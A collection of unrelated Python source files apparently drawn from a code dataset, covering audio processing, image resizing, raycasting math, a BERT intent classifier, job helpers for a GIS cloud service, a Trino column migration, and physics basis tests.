            print("FINISH EPISODE:", self.episode, f"(timestep: {self.time_step})", " timestep ep: ", round(self.episode_len, 4), " sum reward:",
                  round(np.sum(self.rewards), 4), " avg reward:", round(np.mean(self.rewards), 4), " tot dist:", round(self.distance, 4),
                  "avg throt:", round(np.mean(self.throttles), 4), "num laps: ", info["num_lap"])
            self.log.writerow([self.episode, self.time_step, round(np.mean(self.steers), 4), round(np.min(self.rewards), 4),
                               round(np.mean(self.rewards), 4), round(np.max(self.rewards), 4), round(np.sum(self.rewards), 4),
                               self.episode_len, round((time.time() - self.start_episode), 4),
                               round(np.mean(self.velocities), 4), round(np.max(self.velocities), 4),
                               round(np.min(self.ctes), 4), round(np.mean(self.ctes), 4),
                               round(np.max(self.ctes), 4), round(self.distance, 4), round(
                                   np.mean(self.throttles), 4), round(np.max(self.throttles), 4),
                               round(np.min(self.throttles), 4), round(np.mean(self.ctes_absolute), 4),
                               round(np.min(self.ctes_absolute), 4), round(np.max(self.ctes_absolute), 4),
                               self.hit, round(avg_time_lap, 6), round(best_time_lap, 6)])
        return observation, reward, done, info

    def close(self) -> None:
        """
        Closes the environment and the metrics file.
        """
        super(MyMonitor, self).close()
        self.file.flush()
        # Bug fix: the CSV file handle was flushed but never closed,
        # leaking the descriptor for the process lifetime.
        self.file.close()

    def get_total_steps(self) -> int:
        """
        Returns the total number of timesteps
        """
        return self.time_step
class NormalizeObservation(gym.Wrapper):
    """Scales image observations from [0, 255] to float32 values in [0, 1]."""

    def __init__(self, env: gym.Env) -> None:
        super().__init__(env)
        self.env = env

    def reset(self) -> GymObs:
        obs = self.env.reset()
        # Bug fix: reset() previously cast to float16 while step() used
        # float32, so the observation dtype changed after the first step;
        # both now use float32 consistently.
        obs = obs.astype(np.float32)
        obs /= 255.0
        return obs

    def step(self, action) -> GymStepReturn:
        observation, reward, done, info = self.env.step(action)
        observation = observation.astype(np.float32)
        observation /= 255.0
        return observation, reward, done, info
|
StarcoderdataPython
|
120908
|
#!/usr/bin/python3
#
# Copyright © 2017 jared <<EMAIL>>
#
from pydub import AudioSegment, scipy_effects, effects
import os
import settings, util
# combine two audio samples with a crossfade
def combine_samples(acc, file2, CROSSFADE_DUR=100):
util.debug_print('combining ' + file2)
sample2 = AudioSegment.from_wav(file2)
output = acc.append(sample2, crossfade=CROSSFADE_DUR)
output = effects.normalize(output)
return output
def combine_prog_samples(acc, nsamp, CROSSFADE_DUR=100):
    """Append in-memory segment *nsamp* onto *acc* with a crossfade (no normalization)."""
    return acc.append(nsamp, crossfade=CROSSFADE_DUR)
def split_file(fname):
    """Write <fname>_low/_mid/_high.wav: the low-, band- and high-pass
    filtered copies of *fname*, split at the configured frequency limits."""
    source = AudioSegment.from_file(fname)
    scipy_effects.low_pass_filter(source, settings.LOW_FREQUENCY_LIM).export(fname + '_low.wav', 'wav')
    scipy_effects.band_pass_filter(source, settings.LOW_FREQUENCY_LIM, settings.HIGH_FREQUENCY_LIM).export(fname + '_mid.wav', 'wav')
    scipy_effects.high_pass_filter(source, settings.HIGH_FREQUENCY_LIM).export(fname + '_high.wav', 'wav')
## add a sample to an existing wav
#def add_sample(fname, samplefile, CROSSFADE_DUR=100):
# new_file = combine_samples(fname, samplefile, CROSSFADE_DUR)[0]
# os.rename(fname, 'old_' + fname)
# os.rename(new_file, fname)
# return new_file[1]
|
StarcoderdataPython
|
3338597
|
<reponame>risteon/nimble
from __future__ import print_function
import sys
from nimble.sources import KittiOdometrySource
from nimble.sinks import ImageDisplaySink
def main():
    """Load one Kitti odometry frame, print its pose, and display the image."""
    if len(sys.argv) < 2:
        print("Specify the Kitti dataset root folder as argument")
        return
    # Sequence 3 of the odometry benchmark.
    kitti_data = KittiOdometrySource(sys.argv[1], 3)
    kitti_data.advance()
    kitti_data.seek(42)  # only for seekable sources
    data, label = kitti_data.get_data()
    # print transform matrix
    print("Transform: ")
    print(label)
    # show image
    display = ImageDisplaySink()
    display.set_data(data)
# Script entry point.
if __name__ == "__main__":
    main()
|
StarcoderdataPython
|
5008070
|
import os
import argparse
from shutil import move
import cv2
import shutil
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--inputdir", help="full directory path which hold images/data", type=str)
args = parser.parse_args()

# Output directory is created next to the input directory.
new_dir = os.path.join(os.path.dirname(args.inputdir), "resized_selected_images")
if not os.path.isdir(new_dir):
    os.mkdir(new_dir)

for filename in os.listdir(args.inputdir):
    file_path = os.path.join(args.inputdir, filename)
    new_file_path = os.path.join(new_dir, filename)
    image = cv2.imread(file_path)
    # Robustness fix: cv2.imread returns None for unreadable or non-image
    # files, which previously crashed on `image.shape`; skip those entries.
    if image is None:
        continue
    if image.shape[0] <= 400 or image.shape[1] <= 400:
        # Already small enough; copy through unchanged.
        resized = image
    else:
        # Scale so the width becomes 400 px, preserving aspect ratio.
        r = 400.0 / image.shape[1]
        dim = (400, int(image.shape[0] * r))
        resized = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)
    cv2.imwrite(new_file_path, resized)
StarcoderdataPython
|
9638461
|
"""This module contains a type to calculate distances between the player and walls/objects"""
from pygame.math import Vector2
import settings
from side import Side
class Plotter:
    """Ray-casting math: sizes, distances and directions of in-game
    objects relative to the player."""

    def _avoid_zero(self, value):
        """Return *value*, substituting a tiny epsilon for exact zero so
        callers can divide safely."""
        return 0.000001 if value == 0 else value

    def get_object_size_based_on_distance(self, distance):
        """On-screen height (in pixels) an object should occupy, shrinking
        as its distance from the player grows."""
        return int(settings.SCREEN_HEIGHT / self._avoid_zero(distance))

    def get_distance_to_side(self, player_pos, map_pos, ray_direction, distance_delta):
        """Length of the ray from the player position to the first x-side
        and to the first y-side of the grid."""
        # Fraction of the current grid square between the ray origin and the
        # wall it is heading towards, per axis (0 = at the wall, 1 = a full
        # square away). The side depends on the sign of the ray direction.
        if ray_direction.x < 0:
            x_fraction = player_pos.x - map_pos.x
        else:
            x_fraction = map_pos.x + 1 - player_pos.x
        if ray_direction.y < 0:
            y_fraction = player_pos.y - map_pos.y
        else:
            y_fraction = map_pos.y + 1 - player_pos.y
        # Scale the per-square travel distances by those fractions to get the
        # true distance the ray must travel to hit each side.
        distance_to_side = Vector2()
        distance_to_side.x = distance_delta.x * x_fraction
        distance_to_side.y = distance_delta.y * y_fraction
        return distance_to_side

    def get_ray_direction(self, x, player):
        """Direction of the ray cast from the player through screen
        column *x* of the camera plane."""
        # Map the pixel column to camera-plane space: -1 (left) .. 0 .. 1 (right).
        camera_x = 2 * (x / settings.SCREEN_WIDTH) - 1
        return player.direction + player.camera_plane * camera_x

    def get_distance_delta(self, ray_direction):
        """Ray length needed to advance one grid unit in x and in y.

        See https://gamedev.stackexchange.com/q/45013 for the derivation.
        """
        # Scale the ray so each component in turn becomes exactly 1; the
        # length of the scaled vector (Pythagoras) is then the travel
        # distance per unit step along that axis.
        unit_x_ray = ray_direction * (1 / self._avoid_zero(ray_direction.x))
        unit_y_ray = ray_direction * (1 / self._avoid_zero(ray_direction.y))
        distance_delta = Vector2()
        distance_delta.x = unit_x_ray.length()
        distance_delta.y = unit_y_ray.length()
        return distance_delta

    def get_wall_x_across_percentage(self, side, player_pos, ray_direction, perceptual_wall_distance):
        """Where along the wall tile the hit landed, as a fraction in [0, 1)."""
        # For left/right walls the hit position varies along y; for
        # top/bottom walls it varies along x.
        if side == Side.LeftOrRight:
            travelled = player_pos.y + perceptual_wall_distance * ray_direction.y
        else:
            travelled = player_pos.x + perceptual_wall_distance * ray_direction.x
        # Keep only the position within the wall tile: modulo drops the whole
        # part, e.g. 10.77 -> 0.77.
        return travelled % 1

    def get_perceptual_wall_distance(self, side, player, map_pos, step, ray_direction):
        """Wall distance projected onto the camera direction (the oblique
        distance would produce a fisheye effect)."""
        if side == Side.LeftOrRight:
            # Distance covered in x before hitting a side wall; add 1 when
            # stepping in the negative x direction ((1 - step)/2 is 0 or 1).
            travelled = map_pos.x - player.position.x
            correction = (1 - step.x) / 2
            wall_distance = (travelled + correction) / ray_direction.x
        else:
            # Same idea along y for top/bottom walls.
            travelled = map_pos.y - player.position.y
            correction = (1 - step.y) / 2
            wall_distance = (travelled + correction) / ray_direction.y
        return self._avoid_zero(wall_distance)
|
StarcoderdataPython
|
1621301
|
<filename>src/xbot/nlu/intent/intent_with_bert.py
import os
import json
from typing import Any
from src.xbot.util.nlu_util import NLU
from src.xbot.constants import DEFAULT_MODEL_PATH
from src.xbot.util.path import get_root_path, get_config_path, get_data_path
from src.xbot.util.download import download_from_url
from data.crosswoz.data_process.nlu_intent_dataloader import Dataloader
from data.crosswoz.data_process.nlu_intent_postprocess import recover_intent
import torch
from torch import nn
from transformers import BertModel
# def recover_intent_predict(dataloader, intent_logits):
# das = []
#
# max_index = torch.argsort(intent_logits, descending=True).numpy()
# for j in max_index[0:5]:
# intent, domain, slot, value = re.split(r'\+', dataloader.id2intent[j])
# das.append([intent, domain, slot, value])
# return das
class IntentWithBert(nn.Module):
    """Intent classification head on top of a pretrained BERT encoder.

    Pools the BERT output, optionally passes it through one hidden layer,
    and scores intents with a multi-label BCE-with-logits objective.
    """
    def _forward_unimplemented(self, *input: Any) -> None:
        # Satisfies the abstract nn.Module interface; never called directly.
        pass
    def __init__(self, model_config, device, intent_dim, intent_weight=None):
        super(IntentWithBert, self).__init__()
        # count of intent labels
        self.intent_num_labels = intent_dim
        # per-class positive weights for the BCE loss; defaults to uniform 1.0
        self.intent_weight = (
            intent_weight
            if intent_weight is not None
            else torch.tensor([1.0] * intent_dim)
        )
        # device identifier (gpu / cpu)
        self.device = device
        # load pretrained encoder weights from the model hub
        self.bert = BertModel.from_pretrained(model_config["pretrained_weights"])
        self.dropout = nn.Dropout(model_config["dropout"])
        self.finetune = model_config["finetune"]
        self.hidden_units = model_config["hidden_units"]
        if self.hidden_units > 0:
            # optional hidden projection between BERT and the classifier
            self.intent_hidden = nn.Linear(
                self.bert.config.hidden_size, self.hidden_units
            )
            self.intent_classifier = nn.Linear(
                self.hidden_units, self.intent_num_labels
            )
            nn.init.xavier_uniform_(self.intent_hidden.weight)
        else:
            self.intent_classifier = nn.Linear(
                self.bert.config.hidden_size, self.intent_num_labels
            )
        nn.init.xavier_uniform_(self.intent_classifier.weight)
        # Binary Cross Entropy for multi-label intent prediction
        self.intent_loss_fct = torch.nn.BCEWithLogitsLoss(pos_weight=self.intent_weight)
    def forward(self, word_seq_tensor, word_mask_tensor, intent_tensor=None):
        """Return (intent_logits, intent_loss); loss is None when no targets
        are supplied."""
        if not self.finetune:
            # Frozen encoder: torch.no_grad() is a context manager - nothing
            # wrapped by it tracks gradients.
            self.bert.eval()
            with torch.no_grad():
                outputs = self.bert(
                    input_ids=word_seq_tensor, attention_mask=word_mask_tensor
                )
        else:  # fine-tuning: BERT parameters are updated as well
            outputs = self.bert(
                input_ids=word_seq_tensor, attention_mask=word_mask_tensor
            )
        # outputs[1] is the pooled representation produced by the BERT model
        pooled_output = outputs[1]
        if self.hidden_units > 0:
            pooled_output = nn.functional.relu(
                self.intent_hidden(self.dropout(pooled_output))
            )
        pooled_output = self.dropout(pooled_output)
        intent_logits = self.intent_classifier(pooled_output)
        intent_loss = None
        if intent_tensor is not None:
            intent_loss = self.intent_loss_fct(intent_logits, intent_tensor)
        return intent_logits, intent_loss
class IntentWithBertPredictor(NLU):
    """NLU intent-classification predictor backed by IntentWithBert.

    Loads config, vocabulary and the best checkpoint (downloading it on
    first use) and exposes a single-utterance predict() method.
    """

    default_model_config = "nlu/crosswoz_all_context_nlu_intent.json"
    default_model_name = "pytorch-intent-with-bert_policy.pt"
    default_model_url = (
        "http://qiw2jpwfc.hn-bkt.clouddn.com/pytorch-intent-with-bert.pt"
    )

    def __init__(self):
        # resolve config / data / model paths
        root_path = get_root_path()
        config_file = os.path.join(
            get_config_path(), IntentWithBertPredictor.default_model_config
        )
        # load config
        config = json.load(open(config_file))
        self.device = config["DEVICE"]
        # load intent vocabulary and dataloader
        intent_vocab = json.load(
            open(
                os.path.join(
                    get_data_path(), "crosswoz/nlu_intent_data/intent_vocab.json"
                ),
                encoding="utf-8",
            )
        )
        dataloader = Dataloader(
            intent_vocab=intent_vocab,
            pretrained_weights=config["model"]["pretrained_weights"],
        )
        # locate the best checkpoint, downloading it on first use
        best_model_path = os.path.join(
            os.path.join(root_path, DEFAULT_MODEL_PATH),
            IntentWithBertPredictor.default_model_name,
        )
        if not os.path.exists(best_model_path):
            download_from_url(
                IntentWithBertPredictor.default_model_url, best_model_path
            )
        model = IntentWithBert(config["model"], self.device, dataloader.intent_dim)
        model.load_state_dict(torch.load(best_model_path, map_location=self.device))
        model.to(self.device)
        model.eval()
        self.model = model
        self.dataloader = dataloader
        # Fixed: the original printed the path twice ("{p} loaded - {p}").
        print(f"{best_model_path} loaded")

    def predict(self, utterance, context=None):
        """Predict the intents of *utterance*.

        Args:
            utterance: user utterance to classify.
            context: optional dialogue context (currently unused). The
                original signature used the mutable default ``context=list()``,
                which would share one list across all calls; ``None`` avoids
                that anti-pattern while staying call-compatible.

        Returns:
            The recovered intent structure from recover_intent().
        """
        if context is None:
            context = []
        # tokenize the utterance
        ori_word_seq = self.dataloader.tokenizer.tokenize(utterance)
        intents = []
        word_seq, new2ori = ori_word_seq, None
        batch_data = [
            [ori_word_seq, intents, word_seq, self.dataloader.seq_intent2id(intents)]
        ]
        pad_batch = self.dataloader.pad_batch(batch_data)
        pad_batch = tuple(t.to(self.device) for t in pad_batch)
        word_seq_tensor, word_mask_tensor, intent_tensor = pad_batch
        # inference
        intent_logits, _ = self.model(word_seq_tensor, word_mask_tensor)
        # postprocess logits into intent tuples
        intent = recover_intent(self.dataloader, intent_logits[0])
        return intent
if __name__ == "__main__":
    # Smoke test: load the predictor and classify one sample utterance.
    nlu = IntentWithBertPredictor()
    print(nlu.predict("北京布提克精品酒店酒店是什么类型,有健身房吗?"))
|
StarcoderdataPython
|
4970387
|
<reponame>stcz/qfieldcloud<filename>docker-app/qfieldcloud/core/utils2/jobs.py
import logging
from typing import List, Optional
import qfieldcloud.core.models as models
from django.db.models import Q
from qfieldcloud.core import exceptions
logger = logging.getLogger(__name__)
def apply_deltas(
    project: "models.Project",
    user: "models.User",
    project_file: str,
    overwrite_conflicts: bool,
    delta_ids: Optional[List[str]] = None,
) -> Optional["models.ApplyJob"]:
    """Queue an ApplyJob for the project's pending deltas.

    Returns an already pending/queued ApplyJob if one exists, the freshly
    created job otherwise, or None when there are no pending deltas.
    """
    logger.info(
        f"Requested apply_deltas on {project} with {project_file}; overwrite_conflicts: {overwrite_conflicts}; delta_ids: {delta_ids}"
    )
    # Reuse a not-yet-started apply job instead of queueing another one.
    # Fixed: comparing a single-valued field to a list needs the __in lookup;
    # the original `status=[...]` is not a valid equality filter.
    apply_jobs = models.ApplyJob.objects.filter(
        project=project,
        status__in=[
            models.Job.Status.PENDING,
            models.Job.Status.QUEUED,
        ],
    )
    if len(apply_jobs) > 0:
        return apply_jobs[0]
    pending_deltas = models.Delta.objects.filter(
        project=project,
        last_status=models.Delta.Status.PENDING,
    )
    if delta_ids is not None:
        pending_deltas = pending_deltas.filter(pk__in=delta_ids)
    if len(pending_deltas) == 0:
        # nothing to apply
        return None
    apply_job = models.ApplyJob.objects.create(
        project=project,
        created_by=user,
        overwrite_conflicts=overwrite_conflicts,
    )
    return apply_job
def repackage(project: "models.Project", user: "models.User") -> "models.PackageJob":
    """Return an unfinished or freshly created package job.

    Checks if there is already an unfinished package job and returns it,
    or creates a new package job and returns it.

    Raises:
        exceptions.NoQGISProjectError: when the project has no project file.
    """
    if not project.project_filename:
        raise exceptions.NoQGISProjectError()
    # Check if an active (not yet finished) package job already exists.
    query = Q(project=project) & (
        Q(status=models.PackageJob.Status.PENDING)
        | Q(status=models.PackageJob.Status.QUEUED)
        | Q(status=models.PackageJob.Status.STARTED)
    )
    # A single .first() both checks existence and fetches the job. The
    # original count()+get() pair issued two queries and .get() raised
    # MultipleObjectsReturned whenever more than one active job existed.
    existing_job = models.PackageJob.objects.filter(query).first()
    if existing_job is not None:
        return existing_job
    package_job = models.PackageJob.objects.create(project=project, created_by=user)
    return package_job
def repackage_if_needed(
    project: "models.Project", user: "models.User"
) -> "models.PackageJob":
    """Return a package job for the project, repackaging only when needed.

    Raises:
        exceptions.NoQGISProjectError: when the project has no project file.
    """
    if not project.project_filename:
        raise exceptions.NoQGISProjectError()
    if project.needs_repackaging:
        package_job = repackage(project, user)
    else:
        # NOTE(review): .get() raises DoesNotExist when the project has no
        # PackageJob and MultipleObjectsReturned when it has more than one -
        # presumably callers guarantee exactly one exists here; verify.
        package_job = (
            models.PackageJob.objects.filter(project=project)
            .order_by("started_at")
            .get()
        )
    return package_job
|
StarcoderdataPython
|
6662594
|
<filename>scripts/cji_scripts/migrate_trino.py
#! /usr/bin/env python3.8
import logging
import os
import trino
# Root logger: timestamped INFO messages.
logging.basicConfig(format="%(asctime)s: %(message)s", datefmt="%m/%d/%Y %I:%M:%S %p", level=logging.INFO)
# Trino/Presto connection settings, overridable via environment variables.
PRESTO_HOST = os.environ.get("PRESTO_HOST", "localhost")
PRESTO_USER = os.environ.get("PRESTO_USER", "admin")
PRESTO_CATALOG = os.environ.get("PRESTO_CATALOG", "hive")
try:
    PRESTO_PORT = int(os.environ.get("PRESTO_PORT", "8080"))
except ValueError:
    # fall back to the default port when PRESTO_PORT is not a valid integer
    PRESTO_PORT = 8080
# Shared connection parameters; "schema" is rewritten per schema in main().
CONNECT_PARAMS = {
    "host": PRESTO_HOST,
    "port": PRESTO_PORT,
    "user": PRESTO_USER,
    "catalog": PRESTO_CATALOG,
    "schema": "default",
}
def get_schemas():
    """Return all schema names, excluding the built-in system schemas."""
    sql = "SELECT schema_name FROM information_schema.schemata"
    rows = run_trino_sql(sql, CONNECT_PARAMS)
    # Each row is a one-column list; flatten and drop the system schemas.
    excluded = ["default", "information_schema"]
    names = []
    for row in rows:
        for name in row:
            if name not in excluded:
                names.append(name)
    return names
def run_trino_sql(sql, conn_params):
    """Execute *sql* against Trino and return all fetched rows."""
    with trino.dbapi.connect(**conn_params) as conn:
        cursor = conn.cursor()
        cursor.execute(sql)
        return cursor.fetchall()
def drop_tables(tables, conn_params):
    """Drop each named table; failures are logged, never raised."""
    for name in tables:
        logging.info(f"dropping table {name}")
        statement = f"DROP TABLE IF EXISTS {name}"
        try:
            outcome = run_trino_sql(statement, conn_params)
        except Exception as err:
            # best-effort migration: record the failure and continue
            logging.info(err)
        else:
            logging.info("Drop table result: ")
            logging.info(outcome)
def add_columns_to_table(columns, table, conn_params):
    """Add each column (typed double) to *table*; failures are logged only."""
    for column in columns:
        logging.info(f"adding column {column} to table {table}")
        ddl = f"ALTER TABLE {table} ADD COLUMN IF NOT EXISTS {column} double"
        try:
            outcome = run_trino_sql(ddl, conn_params)
        except Exception as err:
            # best-effort migration: record the failure and continue
            logging.info(err)
        else:
            logging.info("ALTER TABLE result: ")
            logging.info(outcome)
def drop_columns_from_table(columns, table, conn_params):
    """Drop each column from *table*; failures are logged, never raised."""
    for column in columns:
        logging.info(f"Dropping column {column} from table {table}")
        ddl = f"ALTER TABLE IF EXISTS {table} DROP COLUMN IF EXISTS {column}"
        try:
            outcome = run_trino_sql(ddl, conn_params)
        except Exception as err:
            # best-effort migration: record the failure and continue
            logging.info(err)
        else:
            logging.info("ALTER TABLE result: ")
            logging.info(outcome)
def main():
    """Drop the obsolete rank columns from every per-tenant Trino schema."""
    logging.info("Running the hive migration for cost model effective cost")
    logging.info("fetching schemas")
    schemas = get_schemas()
    logging.info("Running against the following schemas")
    logging.info(schemas)
    columns_to_drop = ["project_rank", "data_source_rank"]
    # Every OCP-on-cloud project daily summary table plus its temp twin.
    tables = [
        "reporting_ocpawscostlineitem_project_daily_summary_temp",
        "reporting_ocpawscostlineitem_project_daily_summary",
        "reporting_ocpazurecostlineitem_project_daily_summary_temp",
        "reporting_ocpazurecostlineitem_project_daily_summary",
        "reporting_ocpgcpcostlineitem_project_daily_summary_temp",
        "reporting_ocpgcpcostlineitem_project_daily_summary",
    ]
    for schema in schemas:
        CONNECT_PARAMS["schema"] = schema
        logging.info(f"*** Dropping columns for schema {schema} ***")
        for table in tables:
            drop_columns_from_table(columns_to_drop, table, CONNECT_PARAMS)


if __name__ == "__main__":
    main()
|
StarcoderdataPython
|
1702749
|
from openface.openface_model import create_model
from openface.preprocess_face_data import load_metadata
from openface.align import AlignDlib
import numpy as np
import cv2
import config
import os
from datetime import datetime
# Load the pre-trained OpenFace nn4.small2 embedding model.
print('load_model')
nn4_small2_pretrained = create_model()
nn4_small2_pretrained.load_weights('models/nn4.small2.v1.h5')
# nn4_small2_pretrained.summary()
start = datetime.now()  # time the whole embedding run
# Load the custom dataset metadata.
# NOTE(review): the printed path (config.faceImagesPath) and the hard-coded
# 'faceImages' argument to load_metadata look like they should agree - verify.
print(config.faceImagesPath)
metadata = load_metadata('faceImages', num=2)
print(metadata)
def load_image(path):
    """Read the image at *path* and return it in RGB channel order.

    Raises:
        FileNotFoundError: when OpenCV cannot read the file. cv2.imread
            returns None instead of raising, which would otherwise surface
            later as a cryptic TypeError on slicing.
    """
    img = cv2.imread(path, 1)
    if img is None:
        raise FileNotFoundError(f"could not read image: {path}")
    # OpenCV loads images with color channels in BGR order, so reverse the
    # channel axis to obtain RGB.
    return img[..., ::-1]
# Initialize the OpenFace face alignment utility (dlib landmark model).
# NOTE(review): "aligment" is a typo for "alignment"; kept as-is because
# renaming a module-level name could break other importers.
aligment = AlignDlib('models/landmarks.dat')
# Align image on face: crop to 96x96 around the largest detected face,
# anchored on the outer-eyes-and-nose landmark set.
def align_image(img):
    return aligment.align(96, img, aligment.getLargestFaceBoundingBox(img),
                          landmarkIndices=AlignDlib.OUTER_EYES_AND_NOSE)
# Embedding vectors: compute a 128-d embedding per image; images that fail
# alignment are recorded in unfit_image_index and skipped.
good_image_index = []
unfit_image_index = []
embedded = np.zeros((metadata.shape[0], 128))
print('preprocess image')
for i, m in enumerate(metadata):
    img = load_image(m.image_path())
    img = align_image(img)
    try:
        # scale RGB values to interval [0,1]
        img = (img / 255.).astype(np.float32)
    except TypeError:
        # presumably align_image returned None (e.g. no face detected), so
        # the division raised TypeError - confirm against AlignDlib.align
        unfit_image_index.append(i)
        print("The image is not Clear to extract the Embeddings")
    else:
        # obtain embedding vector for image
        embedded[i] = nn4_small2_pretrained.predict(np.expand_dims(img, axis=0))[0]
        good_image_index.append(i)
stop = datetime.now()
print(stop - start)
# Keep only the successfully embedded entries.
metadata = metadata[good_image_index]
print(metadata)
embedded = embedded[good_image_index]
print(embedded)
print('face embedded create complete')
print('save metadata and embedded')
if not os.path.exists(config.faceData):
    # NOTE(review): exist_ok='True' is a truthy string, not the bool True -
    # it works, but is probably unintended.
    os.makedirs(config.faceData, exist_ok='True')
# save metadata
np.save(config.faceData+'/metadata.npy', metadata)
# save embedded
np.save(config.faceData+'/embedded.npy', embedded)
|
StarcoderdataPython
|
304071
|
<filename>compare_methods.py
import sem_utils
import numpy as np
import pandas as pd
# Benchmark: compare confidence-interval estimators for the mean of
# synthetic correlated time series across a (rho, length) grid.
np.random.seed(4578347)
##setup search parameters:
timeseries_lengths = np.array([30,100,300,1000,3000,10000])
timeseries_rhos = np.array([0.1, 0.3, 0.5, 0.7, 0.9, 0.99])
numrpts = 100  # repeats per (rho, length) grid cell
##setup names and estimation functions
method_names = ['Naive', 'BlockAveraging', 'Chodera', 'Sokal', 'AR1_correction', 'AR1_Bayes']
method_functions = [sem_utils.ci_from_independent,
                    sem_utils.ci_from_blockAveraging,
                    sem_utils.ci_from_chodera,
                    sem_utils.ci_from_sokal,
                    sem_utils.ci_from_autoregressive_correction,
                    sem_utils.hpd_from_bayesian_estimation]
##setup df to store the results (we are using long format here due to the complicated structure of the search grid)
df = pd.DataFrame(columns=['methodName', 'trueRho', 'timeSeriesLength', 'estMean', 'mean_low', 'mean_high'])
row_num = 0
##do the measurements:
for rho in timeseries_rhos:
    for datasize in timeseries_lengths:
        for rpt in range(numrpts):
            # one synthetic series per repeat; every method sees the same series
            timeseries = sem_utils.gen_correlated_curve(rho, datasize)
            estimated_mean = timeseries.mean()
            for methodName, function in zip(method_names, method_functions):
                mean_low, mean_high = function(timeseries)
                results = [methodName, rho, datasize, estimated_mean, mean_low, mean_high]
                print(results)
                df.loc[row_num] = results
                row_num += 1
##save the csv file:
df.to_csv('sem_results.csv')
|
StarcoderdataPython
|
354403
|
<filename>Warm-Up Challenges/CountingValleys.py
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the countingValleys function below.
def countingValleys(n, s):
    """Count the valleys walked through on a hike of n steps.

    s is a string of 'U' (up) / 'D' (down) steps starting at sea level; a
    valley ends exactly when an 'U' step returns the hiker to altitude 0.
    """
    step_delta = {'U': 1, 'D': -1}
    altitude = 0
    valleys = 0
    for move in s:
        altitude += step_delta[move]
        # Stepping up onto sea level closes one valley.
        if altitude == 0 and move == 'U':
            valleys += 1
    return valleys
if __name__ == '__main__':
    # HackerRank harness: read n and the step string from stdin, write the
    # valley count to the file named by OUTPUT_PATH.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    n = int(input())
    s = input()
    result = countingValleys(n, s)
    fptr.write(str(result) + '\n')
    fptr.close()
|
StarcoderdataPython
|
266052
|
<gh_stars>100-1000
from __future__ import print_function, division
import sys,os
quspin_path = os.path.join(os.getcwd(),"../")
sys.path.insert(0,quspin_path)
from quspin.operators import hamiltonian
from quspin.basis import spin_basis_general, boson_basis_general, spinless_fermion_basis_general, spinful_fermion_basis_general
import numpy as np
import scipy.sparse as sp
from quspin.operators._make_hamiltonian import _consolidate_static
#
###### define model parameters ######
J1=1.0 # nearest-neighbour spin-spin interaction
J2=0.5 # diagonal coupling strength
# NOTE(review): J2 is used below as a next-nearest (diagonal) coupling,
# despite the original "magnetic field strength" label - verify.
Lx, Ly = 4, 2 # linear dimension of 2d lattice
N_2d = Lx*Ly # number of sites
#
###### setting up user-defined symmetry transformations for 2d lattice ######
s = np.arange(N_2d) # sites [0,1,2,....]
x = s%Lx # x positions for sites
y = s//Lx # y positions for sites
T_x = (x+1)%Lx + Lx*y # translation along x-direction
T_y = x +Lx*((y+1)%Ly) # translation along y-direction
T_a = (x+1)%Lx + Lx*((y+1)%Ly) # translation along anti-diagonal
T_d = (x-1)%Lx + Lx*((y+1)%Ly) # translation along diagonal
R = np.rot90(s.reshape(Lx,Ly), axes=(0,1)).reshape(N_2d) # rotate anti-clockwise
P_x = x + Lx*(Ly-y-1) # reflection about x-axis
P_y = (Lx-x-1) + Lx*y # reflection about y-axis
Z = -(s+1) # spin inversion
#####
# setting up site-coupling lists: [coupling, site, partner-site]
J1_list=[[J1,i,T_x[i]] for i in range(N_2d)] + [[J1,i,T_y[i]] for i in range(N_2d)]
J2_list=[[J2,i,T_d[i]] for i in range(N_2d)] + [[J2,i,T_a[i]] for i in range(N_2d)]
#
static=[ ["++",J1_list],["--",J1_list],["zz",J1_list],
         ["++",J2_list],["--",J2_list],["zz",J2_list]
       ]
# spinful fermions use the |-separated two-species operator strings
static_spfs=[ ["++|",J1_list],["--|",J1_list], ["|++",J1_list],["|--",J1_list], ["z|z",J1_list],
              ["++|",J2_list],["--|",J2_list], ["|++",J2_list],["|--",J2_list], ["z|z",J2_list],
            ]
static_list = _consolidate_static(static)
static_list_spfs = _consolidate_static(static_spfs)
def compare(static_list, basis, basis_op):
    """Check Op_bra_ket of a deferred basis against Op of a constructed one
    for every operator term in *static_list*."""
    for opstr, indx, J in static_list:
        me_bk, bra, ket = basis.Op_bra_ket(opstr, indx, J, np.float64, basis_op.states)
        me_op, row, col = basis_op.Op(opstr, indx, J, np.float64)
        # bra/ket state labels must match Op's row/col states, and the
        # matrix elements themselves must agree to tolerance.
        np.testing.assert_allclose(bra - basis_op[row], 0.0, atol=1E-5, err_msg='failed bra/row in Op_bra_cket test!')
        np.testing.assert_allclose(ket - basis_op[col], 0.0, atol=1E-5, err_msg='failed ket/col in Op_bra_ket test!')
        np.testing.assert_allclose(me_bk - me_op, 0.0, atol=1E-5, err_msg='failed ME in Op_bra_ket test!')
# For each particle-number sector, build the same symmetry-reduced basis
# twice (deferred vs. fully constructed) and compare Op_bra_ket against Op
# for every supported particle type.
for Np in [ None, 2, N_2d-1, [N_2d//4,N_2d//8] ]:
    basis=spin_basis_general(N_2d, make_basis=False,
                             Nup=Np,
                             kxblock=(T_x,0),kyblock=(T_y,0),
                             pxblock=(P_x,0),pyblock=(P_y,0),
                             zblock=(Z,0)
                             )
    basis_op=spin_basis_general(N_2d, make_basis=True,
                                Nup=Np,
                                kxblock=(T_x,0),kyblock=(T_y,0),
                                pxblock=(P_x,0),pyblock=(P_y,0),
                                zblock=(Z,0)
                                )
    compare(static_list,basis,basis_op)
    print('passed spins')
    basis=spinless_fermion_basis_general(N_2d, make_basis=False,
                                         Nf=Np,
                                         kxblock=(T_x,0),kyblock=(T_y,0),
                                         pxblock=(P_x,0),pyblock=(P_y,0),
                                         )
    basis_op=spinless_fermion_basis_general(N_2d, make_basis=True,
                                            Nf=Np,
                                            kxblock=(T_x,0),kyblock=(T_y,0),
                                            pxblock=(P_x,0),pyblock=(P_y,0),
                                            )
    compare(static_list,basis,basis_op)
    print('passed spinless fermios')
    basis=boson_basis_general(N_2d, make_basis=False,
                              Nb=Np, sps=3,
                              kxblock=(T_x,0),kyblock=(T_y,0),
                              pxblock=(P_x,0),pyblock=(P_y,0),
                              )
    basis_op=boson_basis_general(N_2d, make_basis=True,
                                 Nb=Np, sps=3,
                                 kxblock=(T_x,0),kyblock=(T_y,0),
                                 pxblock=(P_x,0),pyblock=(P_y,0),
                                 )
    compare(static_list,basis,basis_op)
    print('passed bosons')
    # spinful fermions need a per-species particle-number specification
